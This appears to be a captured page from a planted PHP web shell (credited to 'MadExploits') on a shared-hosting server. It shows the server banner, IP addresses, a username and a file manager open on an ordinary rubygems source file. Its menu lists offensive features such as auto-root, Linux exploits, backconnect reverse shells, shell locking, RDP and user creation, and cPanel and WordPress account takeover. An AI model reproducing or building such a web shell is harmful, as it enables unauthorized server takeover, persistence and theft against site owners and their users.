Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.224.55.63
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby27 /
share /
rubygems /
rubygems /
package /
[ HOME SHELL ]
Name
Size
Permission
Action
tar_reader
[ DIR ]
drwxr-xr-x
digest_io.rb
1.33
KB
-rw-r--r--
file_source.rb
611
B
-rw-r--r--
io_source.rb
769
B
-rw-r--r--
old.rb
3.63
KB
-rw-r--r--
source.rb
71
B
-rw-r--r--
tar_header.rb
5.91
KB
-rw-r--r--
tar_reader.rb
2.38
KB
-rw-r--r--
tar_test_case.rb
3.65
KB
-rw-r--r--
tar_writer.rb
7.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : io_source.rb
# frozen_string_literal: true ## # Supports reading and writing gems from/to a generic IO object. This is # useful for other applications built on top of rubygems, such as # rubygems.org. # # This is a private class, do not depend on it directly. Instead, pass an IO # object to `Gem::Package.new`. class Gem::Package::IOSource < Gem::Package::Source # :nodoc: all attr_reader :io def initialize(io) @io = io end def start @start ||= begin if io.pos > 0 raise Gem::Package::Error, "Cannot read start unless IO is at start" end value = io.read 20 io.rewind value end end def present? true end def with_read_io yield io end def with_write_io yield io end def path end end
Close